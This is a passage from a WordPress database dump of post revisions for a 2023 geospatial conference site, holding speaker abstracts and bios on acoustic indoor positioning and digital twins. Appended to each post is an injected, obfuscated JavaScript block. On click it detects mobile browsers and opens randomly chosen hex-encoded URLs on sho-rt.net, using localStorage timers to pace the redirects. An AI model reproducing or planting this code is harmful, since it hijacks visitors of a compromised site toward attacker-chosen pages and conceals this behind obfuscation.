_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Deren Li, Intelligent Remote Sensing Satellite Based on the Internet','','inherit','closed','closed','','4578-autosave-v1','','','2023-08-18 19:29:15','2023-08-18 19:29:15','',4578,'https://gsw2023.com/?p=5334',0,'revision','',0),
(5335,1,'2023-08-18 19:23:09','2023-08-18 19:23:09','<!-- wp:paragraph -->\n<p><strong>Prof. Ruizhi Chen, the State Key Laboratory of Information Engineering in Surveying, Mapping and Remote Sensing (LIESMARS), Wuhan University</strong></p>\n<p>&nbsp;</p>\n<p><strong>Presentation title: Positioning Indoors Using Sound</strong></p>\n<p style=\"text-align: justify;\"><strong>Abstract</strong><br />Indoor positioning is a core technology enabling artificial intelligence (AI) applications and playing a pivotal role in AI solutions. However, to develop a positioning solution indoors with high accuracy is still challenging,affected by the complexity of the indoor spaces.<br />Currently, various indoor positioning technologies are appealing in the market, such as the Ultra-Wideband (UWB), WiFi-RTT, Bluetooth AoA/AoD, and AR-based localization et.al. This presentation will introduce an indoor positioning technology based on acoustic waves. It utilizes the microphone built-in smartphones as receivers, and offers a ranging accuracy of 0.12 meters and a positioning accuracy of 0.3 meters for all smartphones without changing their hardware. The precise ranging technology has also been implemented in a single chip to support positioning tag development. It has been commercially deployed in airports, railway stations,  convention centers in China.<br />Together with GNSS technology, it offers a seamless indoor/outdoor navigation service.</p>\n<p>&nbsp;</p>\n<p style=\"text-align: justify;\"><strong>Biography</strong><br />Dr. Ruizhi Chen is a member of the Finnish Academy of Science and Letters. He is currently a Professor at the State Key Laboratory of Information Engineering in Surveying, Mapping and Remote Sensing (LIESMARS) at  Wuhan University, China. He used to be the director of LIESMARS, an Endowed Chair Professor in Texas A&amp;amp;M University Corpus Christ, U.S. and Head &amp;amp; Professor of the Department of Navigation and Positioning at the Finnish Geodetic Institute, Finland. He also worked in Nokia as an Engineering Manager during 1998-2001. Dr. Chen’s research interests include indoor positioning using smartphones and satellite  navigation. He has published two books in English and 156 SCI papers. His research results were selected as cover stories two times in “GPS World”.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Ruizhi Chen, Positioning Indoors Using Sound','','inherit','closed','closed','','4583-autosave-v1','','','2023-08-18 19:23:09','2023-08-18 19:23:09','',4583,'https://gsw2023.com/?p=5335',0,'revision','',0),
(5336,1,'2023-08-18 19:26:33','2023-08-18 19:26:33','<!-- wp:paragraph -->\n<p style=\"text-align: left;\"><strong>Embracing the Future: Exploring Digital Twin, IoT, and Artificial Intelligence Innovations for Energy,</strong><br /><strong>Autonomous Vehicles, and Construction Services</strong></p>\n<p style=\"text-align: justify;\"><br /><strong>Prof. Dr. Mohamed Elhabiby, Micro Engineering Tech Inc.</strong></p>\n<p style=\"text-align: justify;\">Digital twins are virtual replicas of physical assets, systems, or processes, created through 3D reality capture using real-time data from sensors and other sources. They enable simulation, analysis, and optimization of  various aspects of behaviour and performance. In the energy sector, they assist in designing, testing, and optimizing complex systems. In construction, they support maintenance efforts, and their long-term use enables  predictive maintenance through AI and machine learning, optimizing processing time while reducing downtime and costs. The future holds promise with advancements in reality capture sensors, improved accuracy, better  integration with BIM and GIS systems, increased automation, and real-time data processing. AI integration enhances predictive capabilities, leading to autonomous operations, and the expansion of IoT sensors provides  more data for accurate representation. Cloud-based platforms facilitate remote access and collaboration, while virtual and augmented reality advancements offer an immersive understanding of complex systems. Digital  twins are set to revolutionize industries, enabling better decision-making and performance. Case studies from Canada and Egypt will illustrate their applications in construction, road pavement assessment, autonomous vehicles, and energy.</p>\n<p style=\"text-align: justify;\"> </p>\n<p style=\"text-align: justify;\"><strong>Prof. Dr. Mohamed Elhabiby, Bio</strong></p>\n<p style=\"text-align: justify;\">Professor Dr. Mohamed Elhabiby is a highly motivated business professional with extensive industrial experience in research and development (R&amp;amp;D). He is widely recognized for his remarkable contributions to  strategy formulation and implementation, process enhancements, and special projects focused on launching new businesses and establishing exceptional organizations. His leadership style fosters a culture that prioritizes  the well-being of employees, promoting health, safety, and a strong sense of support.<br />As the Co-founder of RoboGarden Inc. and Micro Engineering Tech Inc., based in Calgary, Alberta, and the Co-Founder of Micro Engineering Egypt, located in Cairo, Egypt, Dr. Elhabiby spearheads teams dedicated to  developing cutting-edge technological solutions in the fields of energy, mobility, Smart Cities, and education. His influence extends across Canada and globally. <br />Dr. Elhabiby obtained his Ph.D. in Geomatics Engineering in 2006 and later completed an Executive MBA with a finance specialization at the University of Calgary in 2017. His exceptional work was honoured with the Alberta  Science and Technology Foundation (ASTech) Award in Applied Technology in 2015.<br />Furthermore, Avenue Magazine recognized him as one of the Top 40 under 40 in 2013.<br />Throughout his career, Dr. Elhabiby has held significant positions within esteemed organizations. He is a full Professor at the Faculty of Engineering, Ain Shams University. He served as the Chair of WG 4.1.4:<br />Imaging Techniques, Sub-Commission 4.1 at the International Association of Geodesy. Additionally, he chaired the Geocomputations and Cyber-infrastructure session at the Canadian Geophysical Union annual meeting for  five consecutive years (2008 – 2012) and held the role of Treasurer in the Geodesy Section at the Canadian Geophysical Union for six years (2008-2014). Notably, he led an archaeological mission at the Area of Great  Pyramids in Cairo, Egypt.<br />Dr. Elhabiby has made substantial contributions to academic literature, having published over 150 academic journals, conference presentations, book chapters, workshop proceedings, and technical reports. His expertise  extends to mentoring numerous Ph.D. and MSc. students as well as Post-Doctorate Fellows in both academic and industrial settings.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 